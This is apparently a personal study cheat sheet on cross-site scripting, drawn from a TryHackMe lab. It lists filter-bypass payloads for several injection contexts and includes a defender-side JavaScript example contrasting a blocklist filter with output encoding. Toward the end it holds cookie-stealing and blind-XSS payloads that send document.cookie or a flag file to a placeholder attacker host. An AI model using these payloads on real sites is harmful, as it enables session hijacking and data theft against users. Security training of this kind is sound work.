XSS
XSS (cross-site scripting).
Types of XSS:
- Reflected XSS
- Stored XSS
- DOM XSS
- Blind XSS

DOM XSS (common sources and insecure sinks):
- URL file path, or query parameters
- Insecure JavaScript functions, eg. eval()
- Non-validated user input forms
- window.location.x, eg. window.location.hash
Practice room: https://tryhackme.com/r/room/xss, Task 7 (Perfecting your payload)
Some of the examples listed below are taken from the TryHackMe (THM) practice lab link above.
No filtering:
a) Simply <script>alert('XSS');</script>

Input reflected inside the value attribute of an <input> tag
Eg. XSS payload input:
<script>alert('XSS');</script>
-> <input value="<script>alert('XSS');</script>">
How to bypass:
a) "> <script>alert('XSS');</script>
   " : The first quotation mark is used to escape from the value attribute of the <input> tag
   > : The > character is used to close the <input> tag
Input reflected inside a <textarea> tag
Eg. XSS payload input:
<script>alert('XSS');</script>
-> <textarea><script>alert('XSS');</script></textarea>
How to bypass:
a) </textarea> <script>alert('XSS');</script>
   </textarea> : The <textarea> closing tag closes the textarea, so the <script> that follows is parsed as a tag
Input reflected inside a JavaScript string in a <script> tag
Eg. XSS payload input:
<script>alert('XSS');</script>
-> <script> document.getElementsByClassName(...)[0].innerHTML='<script>alert('XSS'); ...
How to bypass:
a) '; alert('XSS'); //
   '  : To escape from the string
   ;  : To signify the end of the statement on the current line in JavaScript
   // : Turns the rest of the original line into a comment so it is not executed
b) ' </script> <script> alert('THM');</script>
   '  : To escape from the string
   </script> : To close the original <script> tag, allowing a new <script> tag to be opened
Filter removes the word "script"
Eg. <script>alert('XSS');</script>
-> <>alert('XSS');</>
How to bypass:
a) <scripscriptt>alert('XSS');</scripscriptt>
   -> the filter removes "script" once from each tag name: <scrip[script]t> becomes <script>
   -> <script>alert('XSS');</script>
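Added example from the defender's side (my own code, not from the notes or the TryHackMe room): the strip-"script" filter above run against the <scripscriptt> payload, next to the context-aware encoders that neutralize the <input>, <textarea> and inline-<script> payloads from the earlier sections. Function names are my own.

```javascript
// Added example, not from the TryHackMe room: why stripping the word "script"
// is bypassable, and what context-aware output encoding does instead.
// All inputs used in the test are the payloads from the notes above.

// Blocklist filter as in the notes: removes each "script" once, so
// <scripscriptt> collapses into <script>.
function stripScriptOnce(input) {
  return input.replace(/script/gi, "");
}

// Repeating until nothing changes closes the nesting trick but is still a
// blocklist: it does nothing against the " onerror= attribute payloads.
function stripScriptUntilStable(input) {
  let previous;
  do {
    previous = input;
    input = input.replace(/script/gi, "");
  } while (input !== previous);
  return input;
}

// Encoder for HTML body text and double-quoted attribute values: the five
// characters that can change HTML structure become entities.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function encodeForHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// The inline <script> context needs a different encoder: emit a JSON string
// literal and replace "<" so "</script>" cannot end the block early.
function encodeForJsStringLiteral(input) {
  return JSON.stringify(String(input)).replace(/</g, "\\u003c");
}

// Template that reflects user input into value="...", with a pluggable encoder.
function renderInputValue(userValue, encoder) {
  return '<input value="' + encoder(userValue) + '">';
}

// Defender's check: count the tags in the rendered fragment. The template
// contributes exactly one <input>; anything more means the value broke out.
function countTags(html) {
  const tags = html.match(/<\/?[a-z][^>]*>/gi);
  return tags ? tags.length : 0;
}
```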
Filter removes < and > (level 6)
Eg.
Valid input: /images/test.jpg
-> <img src="/images/test.jpg" >
XSS payload input: "> <script>alert('XSS');</script>
-> <img src="" scriptalert('xss');="" script"="">
(< and > removed)
How to bypass:
a) /images/cat.jpg " onload="javascript:alert('THM');"
   Instead of escaping out of the <img> tag to create a new <script> tag, an inline event-handler attribute can be used to call the script instead.
   /images/cat.jpg : Can be any other valid path to an image that exists. This is to trigger the onload attribute function after the image has loaded.
   " : The quotation mark right after the image file path is used to escape the src attribute and create the onload attribute.
b) / " onerror="alert('XSS');"
   Similar to part a)
   / : Can be any other invalid path to an image that does not exist. This is to trigger the onerror attribute function.
   " : The quotation mark right after the invalid image file path is used to escape the src attribute and create the onerror attribute.
a) <img src="/invalid-path" onerror="alert('XSS');">
b) <img src="/valid-path" onload="alert('THM');">
c) Extract the cookies: <img src="/invalid-path" onerror="(function(){console.log(document.cookie);fetch('https://<server_address>:8888?cookie='+btoa(document.cookie));})()">
Netcat command to listen at the <server_address>:
-> Log the cookie and send an API call with the cookie as the request body
Filter disallows the <script></script> tag
How to bypass:
a) Use anchor tag: <a onmouseover="javascript:alert('XSS');">...</a>
b) Use iframe tag: <iframe src="javascript:alert('XSS');">
... refer to the OWASP cheat sheet below for more examples
An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one.
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS')//>\x3e
Taken from: https://tryhackme.com/r/room/xss
Blind XSS callback payloads:
'"> <script>fetch('http://<IP>:[port]?xss=yay')</script>
'"> <script src="http://<IP>:[port]?xss=yay"></script>
Alternative tags: <img/>, <object/>, <iframe/>
Blind XSS payload:
"><script>(function(){
fetch("http://127.0.0.1:8080/flag.txt").then(res=>res.text()).then(data=>fetch("http://<attack_box_ip>:<port>?v="+btoa(data)));
})()</script>